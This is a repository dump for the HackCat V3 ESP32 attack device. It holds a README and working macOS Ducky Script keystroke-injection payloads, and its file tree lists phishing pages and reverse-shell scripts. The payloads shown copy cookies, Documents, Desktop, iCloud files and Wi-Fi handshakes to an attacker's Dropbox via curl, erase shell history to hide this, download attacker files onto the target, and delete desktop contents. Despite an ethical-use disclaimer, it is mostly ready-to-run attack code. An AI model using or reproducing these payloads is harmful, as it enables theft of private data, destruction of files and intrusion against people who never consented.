├── Official Firmware ├── Hack_Cat_V3.0.1.bin ├── Hack_Cat_V3.0.2.bin ├── Hack_Cat_V3.0.3.bin └── Hack_Cat_V3.0.4.bin ├── README.md └── SD-Card ├── Ducky Script ├── Android │ └── test.txt ├── Linux │ └── test.txt ├── Mac │ ├── Executions │ │ ├── Delete Copy Pasta.txt │ │ ├── Bluetooth On.txt │ │ ├── Cookies to Dropbox.txt │ │ ├── Copy Pasta.txt │ │ ├── DarkStorm bruteforce I.P.txt │ │ ├── Desktop Deletion V2.txt │ │ ├── Desktop Deletion.txt │ │ ├── Docs and Desktop to Dropbox API.txt │ │ ├── Dropbox to Desktop Bomb.txt │ │ ├── EAPOL Handshake to Dropbox.txt │ │ ├── Eject DiskUtility.txt │ │ ├── File load Tester.txt │ │ ├── Folder Fun Load tester.txt │ │ ├── Icloud Documents to Dropbox .txt │ │ ├── Imessage Attachments to Dropbox.txt │ │ ├── Infinite Dialog Box.txt │ │ ├── Infinite Dropdown list.txt │ │ ├── MacOs Website redirect.txt │ │ ├── NEVER SLEEP.txt │ │ ├── Remote Shell.txt │ │ ├── Screen Recorder MacOs to Dropbox.txt │ │ ├── Screen Recorder MacOs.txt │ │ ├── System Disruption Loop.txt │ │ ├── System File Deletion.txt │ │ ├── Virtual Network Remote Access.txt │ │ └── iCloud Photos to Dropbox.txt │ ├── Goodusb │ │ ├── Live Chart and price ticker.txt │ │ ├── All Applications at once.txt │ │ ├── AudioInfo.ducky.txt │ │ ├── ClearNotCLose.txt │ │ ├── Dark Mode Toggler.txt │ │ ├── Desktop Organizer Plus.txt │ │ ├── Desktop Organizer.txt │ │ ├── GTOP Monitoring Dashboard.txt │ │ ├── Git Repository Updater.txt │ │ ├── Gmail Address Generator.txt │ │ ├── Homebrew Manager - Streamline Your macOS Package Updates.txt │ │ ├── Htop Digital Dashboard.txt │ │ ├── MacOS ScreenShot.txt │ │ ├── MacUpdaterBot+.txt │ │ ├── MacUpdaterBot.txt │ │ ├── Password Generator.txt │ │ ├── Quick Lock Screen.txt │ │ ├── Toggle Wifi.txt │ │ ├── Vtop Enhanced Dashboard.txt │ │ ├── WIndow Organizer.txt │ │ └── Weather Check.txt │ ├── Obscurity │ │ ├── DarkNet Angel Restore.txt │ │ ├── DarkNet Angel.txt │ │ ├── File Encryption.txt │ │ ├── Fragmentation Traffic Generator.txt │ │ ├── MacCloak Reverse.txt │ │ ├── MacCloak.txt │ │ ├── MacNetGhost.txt │ │ ├── MacNetGhostRestore.txt │ │ ├── Network Padding Fury.txt │ │ ├── Shadowsocks Proxy Ninja Reverse.txt │ │ ├── Shadowsocks Proxy Ninja.txt │ │ ├── Shadowsocks Tor Proxy Reverse.txt │ │ ├── Shadowsocks Tor Proxy.txt │ │ ├── Silent Server Creator.txt │ │ └── TCP Randomizer.txt │ ├── Pranks │ │ ├── ASCII Aquarium.txt │ │ ├── Cat Flickering Terminal.txt │ │ ├── Fake Update.txt │ │ ├── Hacke3 Typer.txt │ │ ├── Hacker Typer Blue.txt │ │ ├── Hacker Typer F Society.txt │ │ ├── Hacker Typer Minecraft.txt │ │ ├── Hacker Typer NASA.txt │ │ ├── Hacker Typer Tegnio.txt │ │ ├── Hacker Typer Umbrella.txt │ │ ├── IPHONE Fake Update.txt │ │ ├── JasonBourneMessage Hack.txt │ │ ├── MacWildRideV2.txt │ │ ├── RIckRoll.txt │ │ ├── Rainbow Matrix.txt │ │ ├── Random Noises.txt │ │ ├── Terminal Tetris.txt │ │ ├── Thomas The Train.txt │ │ ├── colorful Date and time display.txt │ │ └── pipeseroni.txt │ ├── README.md │ └── RECON │ │ ├── Arp table to Iphone.txt │ │ ├── Copy All JPEG Images.txt │ │ ├── Desktop Data to Dropbox.txt │ │ ├── Desktop file list to iPhone.txt │ │ ├── Document to Dropbox API.txt │ │ ├── Dropbox File Downloader.txt │ │ ├── GuardianForge.txt │ │ ├── Infinite Reverse Shell.txt │ │ ├── Info Infiltrator to Iphone.txt │ │ ├── Network Recon Plus.txt │ │ ├── Network Recon to Dropbox.txt │ │ ├── Network Reconnaissance.txt │ │ ├── Nmap Scan to Iphone.txt │ │ ├── Public I.P. to Iphone.txt │ │ ├── SentinelStrike.txt │ │ ├── SocatShell.txt │ │ ├── Voice Logger.txt │ │ └── Web Scraper.txt └── Windows │ └── test.txt ├── Frimware ├── V3.0.1.bin ├── V3.0.2.bin ├── V3.0.3.bin └── V3.0.4.bin ├── HTML ├── Apple.html ├── Facebook.html ├── Facebook2.html ├── Google_Mobile.html ├── Google_Realistic.html ├── Google_Realistic_V2.html ├── JetBlue.html ├── Matrix.html ├── Microsoft.html ├── PornHub.html ├── Starlink.html ├── T_Mobile.html ├── Twitch.html ├── Twitter.html ├── Twitter_X.html ├── United_Airlines.html ├── instagram.html └── test.html ├── Pass-Logs ├── Evil-Twin │ └── test.txt └── Wi-Crack │ └── test.txt ├── Wi-Crack └── test.txt ├── Wordlist ├── IND Default.txt └── IND Default2.txt └── ir ├── ac.ir ├── audio.ir ├── projector.ir └── tv.ir /Official Firmware/Hack_Cat_V3.0.1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/Official Firmware/Hack_Cat_V3.0.1.bin -------------------------------------------------------------------------------- /Official Firmware/Hack_Cat_V3.0.2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/Official Firmware/Hack_Cat_V3.0.2.bin -------------------------------------------------------------------------------- /Official Firmware/Hack_Cat_V3.0.3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/Official Firmware/Hack_Cat_V3.0.3.bin -------------------------------------------------------------------------------- /Official Firmware/Hack_Cat_V3.0.4.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/Official Firmware/Hack_Cat_V3.0.4.bin -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HackCat V3 2 | 3 | **HackCat V3** is a powerful, multi-functional hardware-based penetration testing tool built for cybersecurity professionals, red teamers, and ethical hackers. Designed, developed, and proudly made in India, it brings together wireless security assessment tools into one compact device. 4 | 5 | Developed by [Hacker Nowful](https://www.instagram.com/hacker_nowful/) & [Aswin Asok](https://www.instagram.com/technologybaseofficial/), HackCat V3 allows you to simulate real-world attack scenarios, automate payload delivery, and expand your wireless auditing capabilities using a sleek interface and onboard hardware controls. 6 | 7 | > ⚠️ For educational and ethical use only. Always obtain permission before testing. 8 | 9 | --- 10 | 11 | ## 🔍 Overview 12 | 13 | HackCat V3 includes: 14 | 15 | - ✅ **Wi-Fi Pentesting Tools** – Deauth attacks, beacon spam, evil APs, and more. 16 | - ✅ **Bluetooth Attacks** – BLE jamming, spoofing, and BT HID injections. 17 | - ✅ **Bluetooth Rubber Ducky** – Wireless keystroke injection via BLE. 18 | - ✅ **IR Transmitter** – Record and transmit IR signals from remotes. 19 | - ✅ **2.4GHz / 435MHz Jammers** – For controlled RF signal disruption. 20 | - ✅ **OLED Menu System** – Easy navigation with buttons and display. 21 | - ✅ **SD Card Support** – Store and execute attack scripts directly. 22 | - ✅ **Evil Portal & Packet Monitor** – Phishing and traffic visualization. 23 | - ✅ **SD Updates** – Firmware upgradable via SD Card. 24 | - ✅ **WEB Updates** – Firmware upgradable on [HackGears](https://hackgears.in/hackcat-v3/) Website. 25 | - ✅ **GPIO Expansion** – Plug and play additional sensors or modules. 26 | - ✅ **Status LEDs** – Visual feedback for attack status and error states. 27 | 28 | --- 29 | 30 | ## 🧰 Hardware Specs 31 | 32 | - **MCU**: ESP32 Wroom (Wi-Fi + Bluetooth) 16MB Flash 33 | - **Display**: 1.3" OLED I2C 34 | - **Battery**: 500mAh LiPo, rechargeable (USB-C) 35 | - **Storage**: MicroSD card support 36 | - **Inputs**: 4 physical buttons 37 | - **Extras**: NRF24L01 module, IR TX/RX, 435 MHz RF module 38 | 39 | --- 40 | 41 | ## 📦 What's Included 42 | 43 | - HackCat V3 board 44 | - NRF24L01 module 45 | - IR Transmitter/Receiver 46 | - 435MHz RF Transmitter 47 | 48 | --- 49 | 50 | ## 🛠️ How to Use 51 | 52 | 1. Insert a FAT32-formatted SD card with script files. 53 | 2. Power on the device — the OLED will display the main menu. 54 | 3. Use the buttons to navigate menus and select payloads. 55 | 4. Connect the device to a target (USB/BT/IR) and execute. 56 | 5. Update the firmware via Sd Card or [HackGears](https://hackgears.in/hackcat-v3/) Website. 57 | 58 | --- 59 | 60 | ## 🌐 More Info 61 | 62 | For additional hardware and purchase info, visit the [HackGears Store](https://store.hackgears.in/product/hack_cat-v3/). 63 | 64 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Android/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Ducky Script/Android/test.txt -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Linux/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Ducky Script/Linux/test.txt -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/ Delete Copy Pasta.txt: -------------------------------------------------------------------------------- 1 | REM Deletes the hidden folder ~/.copypasta 2 | REM To be used with copy pasta script 3 | 4 | 5 | REM Author: Narsty 6 | REM Title: Delete Copy Pasta 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Executions 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 1000 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal 16 | DELAY 500 17 | ENTER 18 | DELAY 1000 19 | STRING rm -rf ~/.copypasta 20 | DELAY 500 21 | ENTER 22 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Bluetooth On.txt: -------------------------------------------------------------------------------- 1 | REM Title: BLUETOOTH ON 2 | REM Author: NARSTY 3 | REM Description: Opens spotlight, searches for bluetooth file exchange 4 | REM and turns bluetooth on 5 | REM using the Macs built in bluetooth File Exchange 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: Execution 9 | 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 1000 13 | GUI SPACE 14 | DELAY 1000 15 | STRING bluetooth File Exchange 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | ENTER 20 | DELAY 2000 21 | TAB 22 | DELAY 2000 23 | SPACE 24 | DELAY 1000 25 | GUI W 26 | 27 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Cookies to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This Script will copy the Cookies folder and send them to your dropbox API 2 | REM Replace '' with the systems actual username 3 | REM Replace '' with your actual Dropbox API key 4 | 5 | 6 | REM Here's the breakdown, we navigate to the finder 7 | REM use the Shift GUI G to open up the "go to folder" menu. 8 | REM Then we search for & open the library folder. 9 | REM Now we can type "cook" to navigate to the cookies folder 10 | REM we copy it and navigate to a new window to paste the folder 11 | REM Then we zip the folder and send it to the dropbox 12 | REM Using the nohup and & to make sure the code is executed 13 | 14 | REM Requirements Must have at least two windows open 15 | REM Dropbox API key and targets system username 16 | 17 | 18 | REM Author: Narsty 19 | REM Title: Cookies to Dropbox 20 | REM Version 1.0 MacOs 21 | REM Category: Execution 22 | 23 | 24 | ID 05ac:021e Apple:Keyboard 25 | DELAY 500 26 | GUI SPACE 27 | DELAY 500 28 | STRING Finder 29 | DELAY 1000 30 | ENTER 31 | DELAY 2000 32 | GUI-SHIFT g 33 | DELAY 1000 34 | STRING /Users//Library 35 | DELAY 500 36 | ENTER 37 | DELAY 1000 38 | STRING cook 39 | DELAY 500 40 | GUI c 41 | DELAY 500 42 | CTRL RIGHTARROW 43 | DELAY 1000 44 | GUI v 45 | DELAY 4000 46 | GUI SPACE 47 | DELAY 500 48 | STRING terminal 49 | DELAY 1000 50 | ENTER 51 | DELAY 1000 52 | CTRL c 53 | DELAY 500 54 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 55 | DELAY 500 56 | ENTER 57 | DELAY 500 58 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 59 | DELAY 500 60 | ENTER 61 | DELAY 500 62 | ENTER 63 | DELAY 500 64 | STRING echo 'cd ~/Desktop && zip -r cookies.zip cookies && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/cookies.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @cookies.zip' > upload.sh 65 | DELAY 1000 66 | ENTER 67 | DELAY 2000 68 | STRING chmod +x upload.sh 69 | DELAY 500 70 | ENTER 71 | DELAY 500 72 | STRING nohup ./upload.sh >/dev/null 2>&1 & 73 | DELAY 500 74 | ENTER 75 | DELAY 1000 76 | CTRL C 77 | DELAY 500 78 | STRING rm -r ~/Desktop/cookies 79 | DELAY 1000 80 | ENTER 81 | DELAY 500 82 | STRING rm upload.sh 83 | DELAY 500 84 | ENTER 85 | DELAY 5000 86 | STRING rm -r ~/Desktop/cookies.zip 87 | ENTER 88 | DELAY 500 89 | STRING CLEAR 90 | DELAY 500 91 | ENTER 92 | DELAY 500 93 | STRING rm ~/.bash_history 94 | DELAY 500 95 | GUI w 96 | DELAY 500 97 | ENTER 98 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Copy Pasta.txt: -------------------------------------------------------------------------------- 1 | REM Creates Hidden Folder and Copies Desktop Contents 2 | REM To find the folder follow the steps below. 3 | 4 | REM Open Finder. 5 | REM Click on "Go" in the menu bar at the top of the screen. 6 | REM Select "Go to Folder" from the dropdown menu. 7 | REM In the "Go to the folder" dialog box, enter '~/.copypasta' and click "Go". 8 | 9 | REM Author: Narsty 10 | REM Title: Dark Mode Toggler 11 | REM Target: MacOS 12 | REM Version: 1.0 13 | REM Category: Executions 14 | 15 | 16 | ID 05ac:021e Apple:Keyboard 17 | DELAY 1000 18 | GUI SPACE 19 | DELAY 500 20 | STRING terminal 21 | DELAY 500 22 | ENTER 23 | DELAY 1000 24 | STRING mkdir ~/.copypasta 25 | DELAY 500 26 | ENTER 27 | DELAY 500 28 | STRING cp -R ~/Desktop/* ~/.copypasta/ 29 | DELAY 500 30 | ENTER 31 | DELAY 500 32 | GUI W 33 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/DarkStorm bruteforce I.P.txt: -------------------------------------------------------------------------------- 1 | REM The script will open the Terminal, 2 | REM execute the nmap command to scan for open ports, 3 | REM run nikto for web server vulnerability scanning. 4 | REM Runs Zap to test for Network vulerabilities, prints report to Desktop. You can change location to your flipper on line 48. 5 | REM Tshark command-line tool for capturing and analyzing network traffic. Will create a new file named capture.pcap on your desktop 6 | REM You can change location to your flipper on line 51. 7 | REM Finally the script performs directory and file brute-forcing with gobuster and password files 8 | REM Must store password file on Desktop and name it "common.txt" 9 | 10 | 11 | 12 | REM nmap, nikto, and gobuster can all be downloaded using homebrew/terminal 13 | REM command 'brew install nmap && brew install nikto && brew install gobuster' 14 | 15 | REM Download wireshark to use the terminal Tshark command 16 | REM Download the OWASP ZAP.app file from the official OWASP ZAP website 17 | 18 | 19 | REM nikto command will not execute if you don't have the correct port assigned! 20 | REM verify that the web server is indeed running on an open port 21 | REM as indicated by the Nmap scan, before using the code! 22 | REM Line 45 should look like this after port # is inserted "STRING nikto -h 13.371.118.34 -p 73" 23 | REM To use this script, replace <13.371.118.34 with target_ip> 24 | 25 | 26 | 27 | REM Author: Narsty 28 | REM Title: DarkStorm bruteforce 29 | REM Target: MacOS 30 | REM Version: 1.0 31 | REM Category: Execution 32 | 33 | 34 | ID 05ac:021e Apple:Keyboard 35 | DELAY 1000 36 | GUI SPACE 37 | DELAY 500 38 | STRING terminal 39 | DELAY 500 40 | ENTER 41 | DELAY 1000 42 | STRING nmap -p 1-1000 -T4 -Pn 13.371.118.34 43 | ENTER 44 | DELAY 7000 45 | STRING nikto -h 13.371.118.34 -p 46 | ENTER 47 | DELAY 7000 48 | STRING /Applications/OWASP\ ZAP.app/Contents/Java/zap.sh -cmd -quickurl http://13.371.118.34 -quickout ~/Desktop/quick_scan_results.html 49 | ENTER 50 | DELAY 7000 51 | STRING tshark -i en0 -w ~/Desktop/capture.pcap 52 | ENTER 53 | DELAY 7000 54 | STRING gobuster dir -u http://13.371.118.34 -w ~/Desktop/common.txt -t 50 -q 55 | ENTER 56 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Desktop Deletion V2.txt: -------------------------------------------------------------------------------- 1 | REM Title: Desktop Deletion 2 | REM Author: NARSTY 3 | REM Description: Opens Terminal and enters commands to delete ALL files and folders located on Desktop 4 | REM Please exercise caution when using this command 5 | REM It will permanently delete all files & Folder on the desktop without any confirmation prompts 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: Execution 9 | 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 300 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal.app 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | STRING rm -rf ~/Desktop/* 20 | DELAY 2000 21 | ENTER 22 | DELAY 2000 23 | GUI W 24 | 25 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Desktop Deletion.txt: -------------------------------------------------------------------------------- 1 | REM Title: Desktop Deletion 2 | REM Author: NARSTY 3 | REM Description: Opens Terminal and enters commands to delete files located on Desktop 4 | REM Please exercise caution when using this command 5 | REM It will permanently delete all files on the desktop without any confirmation prompts 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: Execution 9 | 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 300 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal.app 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | STRING rm ~/Desktop/* 20 | DELAY 2000 21 | ENTER 22 | DELAY 2000 23 | GUI W 24 | 25 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Docs and Desktop to Dropbox API.txt: -------------------------------------------------------------------------------- 1 | REM This script will create a folder on the desktop named "backup" 2 | REM it will then copy the Documents and Desktop contents to the folder and create a .zip 3 | REM Once the zip is created it will proceed to send all the contents to your Dropbox 4 | REM you MUST replace "" with your actual API accesss token 5 | 6 | 7 | REM Title: Docs and Desktop to Dropbox API 8 | REM Author: Narsty 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Execution 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 500 15 | GUI SPACE 16 | DELAY 500 17 | STRING Terminal 18 | DELAY 1000 19 | ENTER 20 | DELAY 500 21 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 22 | DELAY 500 23 | ENTER 24 | DELAY 500 25 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 26 | DELAY 500 27 | ENTER 28 | DELAY 500 29 | ENTER 30 | DELAY 500 31 | STRING mkdir -p ~/Desktop/Backup/Desktop 32 | ENTER 33 | DELAY 500 34 | STRING mkdir -p ~/Desktop/Backup/Documents 35 | ENTER 36 | DELAY 500 37 | STRING cp -R ~/Documents/* ~/Desktop/Backup/Documents/ 38 | ENTER 39 | DELAY 500 40 | STRING cp -R ~/Desktop/* ~/Desktop/Backup/Desktop/ 41 | ENTER 42 | DELAY 500 43 | STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh 44 | ENTER 45 | DELAY 2500 46 | ENTER 47 | STRING chmod +x upload.sh 48 | ENTER 49 | DELAY 500 50 | STRING nohup ./upload.sh >/dev/null 2>&1 & 51 | ENTER 52 | DELAY 500 53 | STRING rm upload.sh 54 | DELAY 500 55 | ENTER 56 | DELAY 5000 57 | STRING rm -r ~/Desktop/backup 58 | DELAY 500 59 | ENTER 60 | DELAY 5000 61 | STRING rm backup.zip 62 | DELAY 500 63 | ENTER 64 | DELAY 500 65 | STRING clear 66 | DELAY 500 67 | ENTER 68 | DELAY 250 69 | GUI w 70 | DELAY 1000 71 | ENTER 72 | DELAY 250 73 | ENTER 74 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Dropbox to Desktop Bomb.txt: -------------------------------------------------------------------------------- 1 | REM This script can be used to download files from dropbox to a target MacOs Desktop. 2 | REM files downloaded to the desktop can be used to trigger more complex scripts for further exploitation 3 | 4 | REM Author: Narsty 5 | REM Title: Dropbox to Desktop Bomb 6 | REM Version 1.0 MacOs 7 | REM Category: Execution 8 | 9 | 10 | REM Replace the "" Placeholder with your actual Dropbox API token 11 | REM Replace "" with the URL of the dropbox file 12 | REM Replace the "" placeholder 13 | REM with what you want the name of the file to be on the target desktop 14 | REM Must include file format (.jpeg .doc .txt .mp4) 15 | 16 | 17 | 18 | ID 05ac:021e Apple:Keyboard 19 | DELAY 500 20 | GUI SPACE 21 | DELAY 500 22 | STRING terminal 23 | DELAY 500 24 | ENTER 25 | DELAY 500 26 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 31 | DELAY 500 32 | ENTER 33 | ENTER 34 | DELAY 1000 35 | STRING cd ~/Desktop 36 | ENTER 37 | DELAY 500 38 | STRING echo 'ACCESS_TOKEN=""; DOWNLOAD_URL=""; SAVE_PATH="$HOME/Desktop/"; curl -L -o "$SAVE_PATH" --header "Authorization: Bearer $ACCESS_TOKEN" "$DOWNLOAD_URL"' > download.sh 39 | DELAY 500 40 | STRING chmod +x download.sh 41 | DELAY 500 42 | STRING ./download.sh 43 | DELAY 250 44 | ENTER 45 | DELAY 7000 46 | GUI w 47 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/EAPOL Handshake to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This script discreetly grabs the .PCAP that will contain the FOUR EAPOL handshake keys 2 | REM then zips the file renaming it Captured Handshake and sends it directly to your dropbox API. 3 | REM Replace '' with your actual API access token. 4 | 5 | REM Requirements Wireshark (tshark) can download using the command 'brew install wireshark' 6 | REM Dropbox API token, you can find Documentation under my Executions readme. 7 | 8 | 9 | REM Author: Narsty 10 | REM Title: EAPOL Handshake to Dropbox 11 | REM Version 1.0 MacOs 12 | REM Category: Execution 13 | 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 500 17 | GUI SPACE 18 | DELAY 500 19 | STRING terminal 20 | DELAY 1000 21 | ENTER 22 | DELAY 2000 23 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 24 | DELAY 500 25 | ENTER 26 | DELAY 500 27 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 28 | DELAY 500 29 | ENTER 30 | DELAY 500 31 | ENTER 32 | DELAY 500 33 | STRING networksetup -setairportpower en0 off 34 | DELAY 500 35 | ENTER 36 | DELAY 1000 37 | STRING tshark -i en0 -w ~/Desktop/captured.pcap & 38 | DELAY 1000 39 | ENTER 40 | DELAY 6000 41 | STRING networksetup -setairportpower en0 on 42 | DELAY 500 43 | ENTER 44 | DELAY 3000 45 | STRING pkill -f tshark 46 | DELAY 500 47 | ENTER 48 | DELAY 500 49 | CTRL c 50 | DELAY 2000 51 | STRING echo 'cd ~/Desktop && zip -r "CapturedHandshake.zip" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/CapturedHandshake.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"CapturedHandshake.zip"' > upload.sh 52 | DELAY 500 53 | ENTER 54 | DELAY 500 55 | STRING chmod +x upload.sh 56 | ENTER 57 | DELAY 500 58 | STRING nohup ./upload.sh >/dev/null 2>&1 & 59 | DELAY 500 60 | ENTER 61 | DELAY 10000 62 | STRING rm ~/Desktop/captured.pcap 63 | DELAY 500 64 | ENTER 65 | STRING rm ~/Desktop/CapturedHandshake.zip 66 | DELAY 500 67 | ENTER 68 | STRING rm upload.sh 69 | DELAY 500 70 | ENTER 71 | DELAY 5000 72 | GUI w 73 | DELAY 500 74 | ENTER 75 | 76 | 77 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Eject DiskUtility.txt: -------------------------------------------------------------------------------- 1 | REM Title: Ejcect Disk Utility 2 | REM Author: NARSTY 3 | REM Description: Opens Disk Utility and Ejects The Second Order Disk. 4 | REM Will NOT work if programs are open during execution, please use responsibly 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: Execution 8 | 9 | ID 05ac:021e Apple:Keyboard 10 | DELAY 1000 11 | GUI SPACE 12 | DELAY 200 13 | STRING Disk Utility 14 | DELAY 1000 15 | ENTER 16 | DELAY 1000 17 | GUI DOWNARROW 18 | DELAY 500 19 | ENTER 20 | DELAY 500 21 | GUI E 22 | DELAY 500 23 | ENTER 24 | GUI q 25 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/File load Tester.txt: -------------------------------------------------------------------------------- 1 | REM Creates 100 Files each containing 30MB of random data on the Desktop 2 | REM Can modify the count=30 parameter to change the amount of MB in each file 3 | REM Can modify the '100' to change the number of files created 4 | 5 | REM please be EXTREMELY careful with load testing scripts as they can damage your system 6 | 7 | REM Author: Narsty 8 | REM Title: File load Tester 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Executions 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 1000 15 | GUI SPACE 16 | DELAY 500 17 | STRING terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 1000 21 | STRING cd ~/Desktop && for i in {1..100}; do dd if=/dev/random of=file$i bs=1m count=30; done 22 | DELAY 500 23 | ENTER 24 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Folder Fun Load tester.txt: -------------------------------------------------------------------------------- 1 | REM Creates 400 Folders on the Desktop 2 | REM Can adjust the number "400" to change the numbers of folders created 3 | 4 | REM please be EXTREMELY careful with load testing scripts as they can damage your system 5 | 6 | REM Author: Narsty 7 | REM Title: Folder Fun 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: Executions 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 1000 14 | GUI SPACE 15 | DELAY 500 16 | STRING terminal 17 | DELAY 500 18 | ENTER 19 | DELAY 1000 20 | STRING mkdir ~/Desktop/FunFolders{1..400} 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Icloud Documents to Dropbox .txt: -------------------------------------------------------------------------------- 1 | REM This Script will copy the Documents folder in Icloud and send them to your dropbox API 2 | REM Replace '' with the systems actual username 3 | REM Replace '' with your actual Dropbox API key 4 | 5 | 6 | REM Here's the breakdown, we navigate to the finder 7 | REM use the Shift GUI G to open up the "go to folder" menu. 8 | REM Then we search for & open the mobile iCloud folder. 9 | REM Now we can type "do" to navigate to the Documents folder 10 | REM we copy it and navigate to a new window to paste the folder 11 | REM Then we zip the folder and send it to the dropbox 12 | REM Using the nohup and & to make sure the code is executed 13 | 14 | REM Requirements Must have at least two windows open 15 | REM Dropbox API key and targets system username 16 | 17 | REM Author: Narsty 18 | REM Title: iCloud Documents to Dropbox 19 | REM Version 2.0 MacOs 20 | REM Category: Execution 21 | 22 | 23 | ID 05ac:021e Apple:Keyboard 24 | DELAY 500 25 | GUI SPACE 26 | DELAY 500 27 | STRING Finder 28 | DELAY 1000 29 | ENTER 30 | DELAY 2000 31 | GUI-SHIFT g 32 | DELAY 1000 33 | STRING /Users//Library/mobile 34 | DELAY 500 35 | ENTER 36 | DELAY 1000 37 | STRING do 38 | DELAY 500 39 | GUI c 40 | DELAY 500 41 | CTRL RIGHTARROW 42 | DELAY 1000 43 | GUI v 44 | DELAY 15000 45 | GUI SPACE 46 | DELAY 500 47 | STRING terminal 48 | DELAY 1000 49 | ENTER 50 | DELAY 500 51 | STRING STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 52 | DELAY 500 53 | ENTER 54 | DELAY 500 55 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 56 | DELAY 500 57 | ENTER 58 | DELAY 500 59 | ENTER 60 | DELAY 500 61 | CTRL c 62 | DELAY 1000 63 | STRING echo 'cd ~/Desktop && zip -r Documents.zip Documents && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Documents.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @Documents.zip' > upload.sh 64 | DELAY 1000 65 | ENTER 66 | DELAY 2000 67 | STRING chmod +x upload.sh 68 | DELAY 500 69 | ENTER 